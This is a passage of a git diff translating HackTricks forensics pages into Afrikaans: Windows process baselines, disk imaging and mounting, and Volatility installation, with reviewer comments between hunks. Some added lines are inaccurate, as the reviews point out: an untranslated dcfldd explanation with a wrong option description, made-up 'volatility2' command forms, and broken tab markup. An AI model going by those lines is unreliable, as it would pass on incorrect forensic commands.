+### **USB-toestelgeskiedenis** +- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** en **`HKLM\SYSTEM\ControlSet001\Enum\USB`** bevat ryk besonderhede oor gekoppelde USB-toestelle, insluitend vervaardiger, produknaam en koppeltydstempels. +- Die gebruiker wat met 'n spesifieke USB-toestel diff --git a/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md b/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md index b7d5d37fb..bd6765a2b 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md +++ b/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md @@ -1,147 +1,137 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslag.
## smss.exe -**Session Manager**.\ -Session 0 starts **csrss.exe** and **wininit.exe** (**OS** **services**) while Session 1 starts **csrss.exe** and **winlogon.exe** (**User** **session**). However, you should see **only one process** of that **binary** without children in the processes tree. +**Sessiebestuurder**.\ +Sessie 0 begin **csrss.exe** en **wininit.exe** (**OS-dienste**) terwyl Sessie 1 **csrss.exe** en **winlogon.exe** (**Gebruiker-sessie**) begin. Jy behoort egter **slegs een proses** van daardie **binêre lêer** sonder kinders in die prosesseboom te sien. -Also, sessions apart from 0 and 1 may mean that RDP sessions are occurring. +Daarbenewens kan sessies anders as 0 en 1 beteken dat RDP-sessies plaasvind. ## csrss.exe -**Client/Server Run Subsystem Process**.\ -It manages **processes** and **threads**, makes the **Windows** **API** available for other processes and also **maps drive letters**, create **temp files**, and handles the **shutdown** **process**. +**Kliënt/Bediener Uitvoeringsondersteuningsproses**.\ +Dit bestuur **prosesse** en **drade**, maak die **Windows API** beskikbaar vir ander prosesse en **koppel stuurprogramme aan**, skep **tydelike lêers**, en hanteer die **afsluitingsproses**. -There is one **running in Session 0 and another one in Session 1** (so **2 processes** in the processes tree). Another one is created **per new Session**. +Daar is een wat in Sessie 0 loop en nog een in Sessie 1 (dus **2 prosesse** in die prosesseboom). Nog een word geskep **per nuwe Sessie**. ## winlogon.exe -**Windows Logon Process**.\ -It's responsible for user **logon**/**logoffs**. It launches **logonui.exe** to ask for username and password and then calls **lsass.exe** to verify them. +**Windows Aantekenproses**.\ +Dit is verantwoordelik vir gebruiker **aanmelding**/**afmelding**. Dit begin **logonui.exe** om vir gebruikersnaam en wagwoord te vra en roep dan **lsass.exe** aan om dit te verifieer. 
-Then it launches **userinit.exe** which is specified in **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** with key **Userinit**. +Daarna begin dit **userinit.exe** wat gespesifiseer word in **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** met die sleutel **Userinit**. -Mover over, the previous registry should have **explorer.exe** in the **Shell key** or it might be abused as a **malware persistence method**. +Daarbenewens moet die vorige register **explorer.exe** in die **Shell-sleutel** hê, anders kan dit misbruik word as 'n **kwaadwillige volhardingsmetode**. ## wininit.exe -**Windows Initialization Process**. \ -It launches **services.exe**, **lsass.exe**, and **lsm.exe** in Session 0. There should only be 1 process. +**Windows Inisialisasieproses**. \ +Dit begin **services.exe**, **lsass.exe**, en **lsm.exe** in Sessie 0. Daar behoort slegs 1 proses te wees. ## userinit.exe -**Userinit Logon Application**.\ -Loads the **ntduser.dat in HKCU** and initialises the **user** **environment** and runs **logon** **scripts** and **GPO**. +**Userinit Aanmeldingsprogram**.\ +Laai die **ntuser.dat in HKCU** en inisialiseer die **gebruikersomgewing** en voer **aanmeldingskripte** en **GPO** uit. -It launches **explorer.exe**. +Dit begin **explorer.exe**. ## lsm.exe -**Local Session Manager**.\ -It works with smss.exe to manipulate user sessions: Logon/logoff, shell start, lock/unlock desktop, etc. +**Plaaslike Sessiebestuurder**.\ +Dit werk saam met smss.exe om gebruikersessies te manipuleer: Aanmelding/afmelding, skerm begin, skerm sluit/ontsluit, ens. -After W7 lsm.exe was transformed into a service (lsm.dll). +Na W7 is lsm.exe omskep in 'n diens (lsm.dll). -There should only be 1 process in W7 and from them a service running the DLL. +Daar behoort slegs 1 proses in W7 te wees en daarvandaan 'n diens wat die DLL uitvoer. ## services.exe -**Service Control Manager**.\ -It **loads** **services** configured as **auto-start** and **drivers**. 
+**Diensbeheerder**.\ +Dit **laai** **dienste** wat as **outomatiese aanvang** en **bestuurders** gekonfigureer is. -It's the parent process of **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** and many more. +Dit is die ouerproses van **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** en nog baie meer. -Services are defined in `HKLM\SYSTEM\CurrentControlSet\Services` and this process maintains a DB in memory of service info that can be queried by sc.exe. +Dienste word gedefinieer in `HKLM\SYSTEM\CurrentControlSet\Services` en hierdie proses onderhou 'n databasis in die geheue van diensinligting wat deur sc.exe ondervra kan word. -Note how **some** **services** are going to be running in a **process of their own** and others are going to be **sharing a svchost.exe process**. +Let daarop hoe **sommige** **dienste** in 'n **eie proses** sal loop en ander sal 'n **svchost.exe-proses deel**. -There should only be 1 process. +Daar behoort slegs 1 proses te wees. ## lsass.exe -**Local Security Authority Subsystem**.\ -It's responsible for the user **authentication** and create the **security** **tokens**. It uses authentication packages located in `HKLM\System\CurrentControlSet\Control\Lsa`. +**Plaaslike Sekuriteitsowerheidsondersteuning**.\ +Dit is verantwoordelik vir die gebruiker se **verifikasie** en skep die **sekuriteitstokens**. Dit gebruik verifikasiepakkette wat in `HKLM\System\CurrentControlSet\Control\Lsa` geleë is. -It writes to the **Security** **event** **log** and there should only be 1 process. +Dit skryf na die **Sekuriteit-gebeurtenislogboek** en daar behoort slegs 1 proses te wees. -Keep in mind that this process is highly attacked to dump passwords. +Hou in gedagte dat hierdie proses hoogs aangeval word om wagwoorde te dump. ## svchost.exe -**Generic Service Host Process**.\ -It hosts multiple DLL services in one shared process. 
+**Generiese Diensgasheerproses**.\ +Dit bied onderdak aan verskeie DLL-dienste in een gedeelde proses. -Usually, you will find that **svchost.exe** is launched with the `-k` flag. This will launch a query to the registry **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** where there will be a key with the argument mentioned in -k that will contain the services to launch in the same process. +Gewoonlik sal jy vind dat **svchost.exe** met die `-k` vlag geloods word. Dit sal 'n navraag na die register **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** loods waar daar 'n sleutel met die genoemde argument sal wees wat die dienste bevat wat in dieselfde proses geloods moet word. -For example: `-k UnistackSvcGroup` will launch: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc` +Byvoorbeeld: `-k UnistackSvcGroup` sal loods: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc` -If the **flag `-s`** is also used with an argument, then svchost is asked to **only launch the specified service** in this argument. +As die **vlag `-s`** ook saam met 'n argument gebruik word, word svchost gevra om **slegs die gespesifiseerde diens** in hierdie argument te loods. -There will be several processes of `svchost.exe`. If any of them is **not using the `-k` flag**, then that's very suspicious. If you find that **services.exe is not the parent**, that's also very suspicious. +Daar sal verskeie prosesse van `svchost.exe` wees. As een van hulle **nie die `-k` vlag gebruik nie**, is dit baie verdag. As jy vind dat **services.exe nie die ouerproses is nie**, is dit ook baie verdag. ## taskhost.exe -This process act as a host for processes running from DLLs. It also loads the services that are running from DLLs. +Hierdie proses tree op as 'n gasheer vir prosesse wat van DLL's loop. Dit laai ook die dienste wat van DLL's loop. 
-In W8 this is called taskhostex.exe and in W10 taskhostw.exe. +In W8 word dit taskhostex.exe genoem en in W10 taskhostw.exe. ## explorer.exe -This is the process responsible for the **user's desktop** and launching files via file extensions. +Hierdie is die proses wat verantwoordelik is vir die **gebruiker se lessenaar** en die loods van lêers via lêeruitbreidings. -**Only 1** process should be spawned **per logged on user.** +**Slegs 1** proses behoort **per aangemelde gebruiker** gegenereer te word. -This is run from **userinit.exe** which should be terminated, so **no parent** should appear for this process. +Dit word uitgevoer vanaf **userinit.exe** wat beëindig moet word, sodat **geen ouerproses** vir hierdie proses moet verskyn nie. -# Catching Malicious Processes +# Vang kwaadwillige prosesse -* Is it running from the expected path? (No Windows binaries run from temp location) -* Is it communicating with weird IPs? -* Check digital signatures (Microsoft artifacts should be signed) -* Is it spelled correctly? -* Is running under the expected SID? -* Is the parent process the expected one (if any)? -* Are the children processes the expecting ones? (no cmd.exe, wscript.exe, powershell.exe..?) +* Loop dit vanaf die verwagte pad? (Geen Windows-binêre lêers loop vanaf 'n tydelike plek nie) +* Kommunikeer dit met vreemde IP-adresse? +* Kontroleer digitale handtekeninge (Microsoft-artefakte moet onderteken wees) +* Is dit korrek gespel? +* Loop dit onder die verwagte SID? +* Is die ouerproses die verwagte een (indien enige)? +* Is die kinderprosesse die verwagte (geen cmd.exe, wscript.exe, powershell.exe nie)?
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! +Ander maniere om HackTricks te ondersteun: +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, ky diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md b/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md index ebacbbf4d..d42400eed 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md @@ -1,46 +1,53 @@ -# Image Acquisition & Mount +# Beeldverwerwing & Monteer
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-## Acquisition +## Verwerwing ### DD - ```bash #This will generate a raw copy of the disk dd if=/dev/sdb of=disk.img ``` - ### dcfldd +dcfldd is a command-line tool that is used for creating and hashing disk images. It is an enhanced version of the dd command and provides additional features such as on-the-fly hashing, progress reporting, and error handling. + +To use dcfldd, you need to specify the input and output files or devices. You can also specify options such as block size, hash algorithm, and progress reporting interval. + +Here is an example command to create a disk image using dcfldd: + +``` +dcfldd if=/dev/sda of=image.dd bs=4M hash=md5 hashwindow=10M hashlog=image.md5.log statusinterval=1MB +``` + +In this example, we are creating a disk image from the /dev/sda device and saving it as image.dd. We are using a block size of 4MB and hashing the image using the MD5 algorithm. The hash window is set to 10MB, which means that the hash is calculated for every 10MB of data. The hash log is saved in the image.md5.log file. The status interval is set to 1MB, which means that progress is reported every 1MB. + +dcfldd is a powerful tool that can be used for forensic imaging and data acquisition. It is widely used in the field of digital forensics and can help in preserving and analyzing evidence. ```bash #Raw copy with hashes along the way (more secur as it checks hashes while it's copying the data) dcfldd if= of= bs=512 hash= hashwindow= hashlog= dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes ``` - ### FTK Imager -You can [**download the FTK imager from here**](https://accessdata.com/product-download/debian-and-ubuntu-x64-3-1-1). - +Jy kan die FTK imager [**hier aflaai**](https://accessdata.com/product-download/debian-and-ubuntu-x64-3-1-1). 
```bash ftkimager /dev/sdb evidence --e01 --case-number 1 --evidence-number 1 --description 'A description' --examiner 'Your name' ``` - ### EWF -You can generate a disk image using the[ **ewf tools**](https://github.com/libyal/libewf). - +Jy kan 'n skyfbeeld genereer deur die [**ewf tools**](https://github.com/libyal/libewf) te gebruik. ```bash ewfacquire /dev/sdb #Name: evidence 
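Review bot: the paragraph added under `### dcfldd` is untranslated English inside an Afrikaans translation patch, and its example command is wrong about `statusinterval`: dcfldd's `statusinterval=N` is a count of blocks, so `statusinterval=1MB` does not give "progress every 1MB" as the sentence claims. The paragraph also recommends `hash=md5` while the existing example directly below it (`dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes`) already uses SHA-256; for evidence imaging keep the stronger hash. Either drop the paragraph, since the existing two-line block already documents the options, or translate it and change the command to `bs=4M hash=sha256 hashwindow=10M hashlog=image.sha256.log statusinterval=256`. While touching this hunk, the context comment `more secur as it checks hashes` still carries the `secur` typo.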
@@ -57,52 +64,56 @@ ewfacquire /dev/sdb #Then use default values #It will generate the disk image in the current directory ``` +## Monteer -## Mount +### Verskeie tipes -### Several types - -In **Windows** you can try to use the free version of Arsenal Image Mounter ([https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)) to **mount the forensics image**. - -### Raw +In **Windows** kan jy probeer om die gratis weergawe van Arsenal Image Mounter ([https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/)) te gebruik om **die forensiese beeld te monteer**. +### Rou ```bash #Get file type -file evidence.img +file evidence.img evidence.img: Linux rev 1.0 ext4 filesystem data, UUID=1031571c-f398-4bfb-a414-b82b280cf299 (extents) (64bit) (large files) (huge files) #Mount it mount evidence.img /mnt ``` - ### EWF +EWF (EnCase Evidence File) is a file format used for forensic disk imaging. It is commonly used in digital forensics to create a forensic image of a disk or a partition. The EWF format ensures the integrity and authenticity of the acquired image by storing a cryptographic hash of the data. + +To acquire an image using EWF, you can use tools like EnCase, FTK Imager, or ewfacquire. These tools allow you to create a bit-by-bit copy of the disk or partition, including both allocated and unallocated space. + +The EWF format has several advantages over other imaging formats. It supports compression, which can reduce the size of the acquired image. It also supports encryption, which can protect the image from unauthorized access. Additionally, EWF files can be easily mounted and accessed using tools like ewfmount. + +To mount an EWF file, you can use the ewfmount command followed by the path to the EWF file and the mount point. This will create a virtual disk that contains the contents of the EWF file, allowing you to access and analyze the data within. 
+ +Overall, EWF is a reliable and widely used format for acquiring and analyzing disk images in digital forensics. Its support for compression, encryption, and easy mounting makes it a valuable tool for forensic investigators. ```bash #Get file type -file evidence.E01 +file evidence.E01 evidence.E01: EWF/Expert Witness/EnCase image file format #Transform to raw mkdir output ewfmount evidence.E01 output/ -file output/ewf1 +file output/ewf1 output/ewf1: Linux rev 1.0 ext4 filesystem data, UUID=05acca66-d042-4ab2-9e9c-be813be09b24 (needs journal recovery) (extents) (64bit) (large files) (huge files) #Mount mount output/ewf1 -o ro,norecovery /mnt ``` - ### ArsenalImageMounter -It's a Windows Application to mount volumes. You can download it here [https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/) +Dit is 'n Windows-toepassing om volumes te monteer. Jy kan dit hier aflaai [https://arsenalrecon.com/downloads/](https://arsenalrecon.com/downloads/) -### Errors - -* **`cannot mount /dev/loop0 read-only`** in this case you need to use the flags **`-o ro,norecovery`** -* **`wrong fs type, bad option, bad superblock on /dev/loop0, missing codepage or helper program, or other error.`** in this case the mount failed due as the offset of the filesystem is different than that of the disk image. You need to find the Sector size and the Start sector: +### Foute +* **`kan nie /dev/loop0 as slegs-lees monteer nie`** in hierdie geval moet jy die vlae **`-o ro,norecovery`** gebruik +* **`verkeerde fs-tipe, slegte opsie, slegte superblock op /dev/loop0, ontbrekende kodebladsy of hulpprogram, of ander fout.`** in hierdie geval het die monteer misluk as gevolg van die verskil in die verskuiwing van die lêersisteem en die skyfbeeld. 
Jy moet die Sektor-grootte en die Beginsektor vind: ```bash -fdisk -l disk.img +fdisk -l disk.img Disk disk.img: 102 MiB, 106954648 bytes, 208896 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes @@ -113,21 +124,18 @@ Disk identifier: 0x00495395 Device Boot Start End Sectors Size Id Type disk.img1 2048 208895 206848 101M 1 FAT12 ``` - -Note that sector size is **512** and start is **2048**. Then mount the image like this: - +Let daarop dat die sektor grootte **512** is en die beginpunt is **2048**. Monteer dan die prent soos volg: ```bash mount disk.img /mnt -o ro,offset=$((2048*512)) ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
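Review bot: `Monteer dan die prent soos volg` uses `prent` (a picture) for the disk image, while the rest of this file renders it as `skyfbeeld` / `beeld` (`Beeldverwerwing`, `die forensiese beeld te monteer`, `Jy kan 'n skyfbeeld genereer`); change it to `Monteer dan die skyfbeeld soos volg` so the term stays consistent for the reader. The `fdisk -l` walkthrough and the `mount disk.img /mnt -o ro,offset=$((2048*512))` line are left intact, which is correct: the sector size and start sector are values the reader must read off their own output.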
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md b/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md index 6b2f7bc97..aabc1cb12 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md @@ -1,16 +1,16 @@ -# Volatility - CheatSheet +# Volatility - Spiekbrief
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
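Review bot: the translated support boilerplate is not consistent across the files in this patch. Here the last bullet reads `Deel jou hacktruuks deur PR's in te dien by die ... github-repos`, the image-acquisition footer above reads `Deel jou hacking-truuks ... hacktricks-repo`, and windows-processes.md reads `Deel jou hacking-truuks ... GitHub-opslag`. This block is repeated verbatim on every page, so settle on one rendering (for example `Deel jou hacking-truuks deur PR's in te dien by die ... GitHub-repos`) and apply it in all four files; otherwise any later bulk update of the footer will have to special-case each page.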
@@ -18,37 +18,62 @@ Other ways to support HackTricks:
-​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +​​[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline. {% embed url="https://www.rootedcon.com/" %} -If you want something **fast and crazy** that will launch several Volatility plugins on parallel you can use: [https://github.com/carlospolop/autoVolatility](https://github.com/carlospolop/autoVolatility) - +As jy iets **vinnig en mal** wil hê wat verskeie Volatility-plugins gelyktydig sal uitvoer, kan jy gebruik maak van: [https://github.com/carlospolop/autoVolatility](https://github.com/carlospolop/autoVolatility) ```bash python autoVolatility.py -f MEMFILE -d OUT_DIRECTORY -e /home/user/tools/volatility/vol.py # It will use the most important plugins (could use a lot of space depending on the size of the memory) ``` - -## Installation +## Installasie ### volatility3 - ```bash git clone https://github.com/volatilityfoundation/volatility3.git cd volatility3 python3 setup.py install python3 vol.py —h ``` +#### Metode 1 -### volatility2 +Die eerste metode wat gebruik kan word om 'n geheue-dump te analiseer, is deur die gebruik van die `volatility2`-raamwerk. Hier is 'n paar nuttige opdragte wat gebruik kan word: -{% tabs %} -{% tab title="Method1" %} +##### Basiese opdragte + +- `imageinfo`: Hierdie opdrag gee inligting oor die geheue-dump, soos die besturingstelsel, die argitektuur en die tyd van die dump. +- `pslist`: Hierdie opdrag lys die aktiewe prosesse in die geheue-dump. 
+- `pstree`: Hierdie opdrag gee 'n boomstruktuur van die prosesse in die geheue-dump. +- `dlllist`: Hierdie opdrag lys die gelaai DLL's in die geheue-dump. +- `handles`: Hierdie opdrag gee 'n lys van die hanteerders in die geheue-dump. +- `filescan`: Hierdie opdrag soek na oop lêers in die geheue-dump. +- `cmdline`: Hierdie opdrag gee die opdraglyne van die prosesse in die geheue-dump. +- `vadinfo`: Hierdie opdrag gee inligting oor die virtuele adresruimtes in die geheue-dump. + +##### Gevorderde opdragte + +- `malfind`: Hierdie opdrag soek na verdagte kode in die geheue-dump. +- `apihooks`: Hierdie opdrag soek na API-hake in die geheue-dump. +- `ldrmodules`: Hierdie opdrag gee inligting oor die gelaai modules in die geheue-dump. +- `modscan`: Hierdie opdrag soek na verdagte modules in die geheue-dump. +- `ssdt`: Hierdie opdrag gee inligting oor die System Service Descriptor Table (SSDT) in die geheue-dump. +- `driverscan`: Hierdie opdrag soek na verdagte bestuurders in die geheue-dump. +- `mutantscan`: Hierdie opdrag soek na verdagte mutante in die geheue-dump. + +##### Voorbeeldopdragte + +- `volatility2 -f dump.raw imageinfo`: Voer die `imageinfo`-opdrag uit op die geheue-dump `dump.raw`. +- `volatility2 -f dump.raw pslist`: Lys die aktiewe prosesse in die geheue-dump `dump.raw`. +- `volatility2 -f dump.raw malfind`: Soek na verdagte kode in die geheue-dump `dump.raw`. +- `volatility2 -f dump.raw ldrmodules`: Gee inligting oor die gelaai modules in die geheue-dump `dump.raw`. + +{% endtab %} + +{% tab title="Method2" %} ``` Download the executable from https://www.volatilityfoundation.org/26 ``` -{% endtab %} - -{% tab title="Method 2" %} +{% tab title="Metode 2" %} ```bash git clone https://github.com/volatilityfoundation/volatility.git cd volatility 
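Review bot: this hunk breaks the GitBook tabs block. It deletes `{% tabs %}` and `{% tab title="Method1" %}` but leaves the closing `{% endtab %}` and `{% endtabs %}` as context in the next hunk, and it inserts `{% endtab %}` followed by `{% tab title="Method2" %}` and then `{% tab title="Metode 2" %}` with no `{% endtab %}` between them, so the rendered page has an orphan close, two consecutive opens and no enclosing `{% tabs %}`. Keep the original skeleton and translate only the titles: `{% tabs %}` / `{% tab title="Metode 1" %}` ... `{% endtab %}` / `{% tab title="Metode 2" %}` ... `{% endtab %}` / `{% endtabs %}`. The hunk also replaces the `### volatility2` heading with `#### Metode 1`, which moves the volatility2 install steps under `### volatility3`, and the new `Basiese opdragte` / `Gevorderde opdragte` lists are content the English page does not have: `volatility2 -f dump.raw imageinfo` is not how the tool is invoked (the page itself uses `vol.py`), and plugin descriptions do not belong in the installation section. Drop those lists; `Download the executable from https://www.volatilityfoundation.org/26` is the whole of Method 1. Minor: the context line `python3 vol.py —h` uses an em-dash where `-h` is meant.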
